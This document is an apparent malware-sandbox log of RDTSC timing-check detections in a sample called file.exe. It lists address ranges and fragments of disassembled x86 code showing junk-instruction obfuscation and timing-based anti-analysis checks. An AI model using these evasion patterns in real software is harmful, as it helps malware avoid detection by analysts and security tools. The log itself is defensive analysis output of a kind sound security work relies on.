Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 610AA9 second address: 610AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 610AAD second address: 610AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FA6C4C2AB36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 610AB9 second address: 610ABE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 610BB2 second address: 610BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 610BB8 second address: 610BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 610BBC second address: 610BC4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6160E7 second address: 6160EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6160EB second address: 61610A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA6C4C2AB36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA6C4C2AB43h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61610A second address: 61614F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA6C4D39086h 0x00000008 jmp 00007FA6C4D39092h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007FA6C4D3908Ch 0x00000015 jg 00007FA6C4D39086h 0x0000001b popad 0x0000001c je 00007FA6C4D390A2h 0x00000022 push esi 0x00000023 pushad 0x00000024 popad 0x00000025 pop esi 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FA6C4D3908Ah 0x0000002d jl 00007FA6C4D39086h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 614EC8 second address: 614ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 614ECF second address: 614ED5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 614ED5 second address: 614EDF instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA6C4C2AB36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EA5B7 second address: 5EA5BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EA5BB second address: 5CAC46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FA6C4C2AB38h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 call dword ptr [ebp+122D35EAh] 0x0000002b jne 00007FA6C4C2AB3Eh 0x00000031 push eax 0x00000032 push edx 0x00000033 push edi 0x00000034 jmp 00007FA6C4C2AB3Ah 0x00000039 jmp 00007FA6C4C2AB3Dh 0x0000003e pop edi 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EA79A second address: 5EA7A4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA6C4D39086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EACA9 second address: 5EACFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edi 0x0000000c jg 00007FA6C4C2AB38h 0x00000012 pop edi 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 jng 00007FA6C4C2AB4Dh 0x0000001c jmp 00007FA6C4C2AB47h 0x00000021 push eax 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 pop eax 0x00000025 popad 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FA6C4C2AB44h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EAFB9 second address: 5EAFBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EB12A second address: 5EB1D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FA6C4C2AB49h 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FA6C4C2AB38h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 add dword ptr [ebp+1245955Dh], edx 0x0000002c push 00000004h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007FA6C4C2AB38h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 00000018h 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 mov dx, di 0x0000004b or edi, dword ptr [ebp+1245A270h] 0x00000051 nop 0x00000052 pushad 0x00000053 push edi 0x00000054 push ecx 0x00000055 pop ecx 0x00000056 pop edi 0x00000057 push esi 0x00000058 jmp 00007FA6C4C2AB48h 0x0000005d pop esi 0x0000005e popad 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 jnp 00007FA6C4C2AB3Ch 0x00000068 jnl 00007FA6C4C2AB36h 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EB571 second address: 5EB579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EB87A second address: 5EB87F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EB87F second address: 5EB896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA6C4D3908Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EB896 second address: 5EB8A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EB8A0 second address: 5EB8A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EB9E0 second address: 5EB9E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EB9E8 second address: 5EBA19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push esi 0x0000000a mov dword ptr [ebp+12457AB4h], edx 0x00000010 pop edi 0x00000011 lea eax, dword ptr [ebp+1248E2EAh] 0x00000017 mov edi, dword ptr [ebp+122D2FDAh] 0x0000001d push eax 0x0000001e mov di, ax 0x00000021 pop edi 0x00000022 push eax 0x00000023 js 00007FA6C4D39094h 0x00000029 push eax 0x0000002a push edx 0x0000002b ja 00007FA6C4D39086h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EBA19 second address: 5CB71F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 call dword ptr [ebp+122D26B5h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA6C4C2AB42h 0x00000016 push eax 0x00000017 push edx 0x00000018 jnc 00007FA6C4C2AB36h 0x0000001e jmp 00007FA6C4C2AB3Ah 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CB71F second address: 5CB729 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA6C4D39086h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CB729 second address: 5CB72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ADB47 second address: 5ADB4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ADB4B second address: 5ADB55 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA6C4C2AB36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6151D6 second address: 6151E0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA6C4D39086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6154B6 second address: 6154F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FA6C4C2AB49h 0x0000000f jns 00007FA6C4C2AB4Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6157C3 second address: 6157DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39092h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6157DD second address: 6157E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6157E3 second address: 6157E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61593E second address: 615948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA6C4C2AB36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615948 second address: 61595E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39092h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5979E6 second address: 5979F0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA6C4C2AB36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5979F0 second address: 5979F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5979F6 second address: 597A0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4C2AB42h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 597A0C second address: 597A2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39092h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 597A2A second address: 597A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 597A30 second address: 597A3C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jl 00007FA6C4D39086h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 597A3C second address: 597A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4C2AB40h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 597A52 second address: 597A68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D3908Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61A274 second address: 61A2A6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FA6C4C2AB48h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FA6C4C2AB3Eh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61A2A6 second address: 61A2AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61A2AA second address: 61A2C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 jno 00007FA6C4C2AB3Ch 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61E0AE second address: 61E0C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4D39093h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61E0C7 second address: 61E0D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FA6C4C2AB36h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 621EE5 second address: 621F0F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA6C4D39086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FA6C4D39088h 0x00000010 push edi 0x00000011 jmp 00007FA6C4D39095h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 622953 second address: 622959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 622959 second address: 62295D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62713A second address: 62714C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62714C second address: 62715C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FA6C4D39086h 0x0000000a jg 00007FA6C4D39086h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 627297 second address: 6272A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6282CA second address: 6282DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FA6C4D39086h 0x0000000a jmp 00007FA6C4D3908Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6282DE second address: 628311 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 ja 00007FA6C4C2AB36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007FA6C4C2AB5Ah 0x00000014 push eax 0x00000015 pushad 0x00000016 popad 0x00000017 pop eax 0x00000018 push ecx 0x00000019 jmp 00007FA6C4C2AB48h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62B7AC second address: 62B7CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4D39096h 0x00000009 pushad 0x0000000a popad 0x0000000b jc 00007FA6C4D39086h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62B7CF second address: 62B7D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62B7D7 second address: 62B7E1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62B7E1 second address: 62B7E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62B1E9 second address: 62B1ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62B1ED second address: 62B1F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62B1F3 second address: 62B1FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62B36D second address: 62B383 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA6C4C2AB3Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62B383 second address: 62B387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62B387 second address: 62B3AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB42h 0x00000007 jmp 00007FA6C4C2AB3Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f pushad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62B3AD second address: 62B3B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62B3B3 second address: 62B3BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62D94F second address: 62D95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62D4E9 second address: 62D50C instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA6C4C2AB36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA6C4C2AB45h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 632E1A second address: 632E25 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jne 00007FA6C4D39086h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 632F76 second address: 632F7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 632F7A second address: 632F8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FA6C4D3908Eh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6330B6 second address: 6330BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633224 second address: 633228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63334B second address: 633351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633351 second address: 63336A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FA6C4D39093h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EB378 second address: 5EB37D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EB37D second address: 5EB382 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EB382 second address: 5EB3E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop edx 0x00000013 popad 0x00000014 nop 0x00000015 and edi, 33F111E0h 0x0000001b mov ebx, dword ptr [ebp+1248E329h] 0x00000021 mov dword ptr [ebp+122D1FBEh], edi 0x00000027 add eax, ebx 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007FA6C4C2AB38h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 00000014h 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 jmp 00007FA6C4C2AB3Ch 0x00000048 push esi 0x00000049 add edi, dword ptr [ebp+122D288Dh] 0x0000004f pop ecx 0x00000050 nop 0x00000051 push eax 0x00000052 pushad 0x00000053 push edx 0x00000054 pop edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EB3E2 second address: 5EB441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007FA6C4D39099h 0x0000000d jg 00007FA6C4D39093h 0x00000013 jmp 00007FA6C4D3908Dh 0x00000018 nop 0x00000019 jno 00007FA6C4D39089h 0x0000001f push 00000004h 0x00000021 sub dword ptr [ebp+122D1B91h], edx 0x00000027 nop 0x00000028 pushad 0x00000029 pushad 0x0000002a pushad 0x0000002b popad 0x0000002c pushad 0x0000002d popad 0x0000002e popad 0x0000002f jmp 00007FA6C4D39095h 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jg 00007FA6C4D3908Ch 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633647 second address: 63364B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63364B second address: 63367D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4D3908Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007FA6C4D39095h 0x00000013 jns 00007FA6C4D39086h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6341FE second address: 634203 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 637427 second address: 637433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
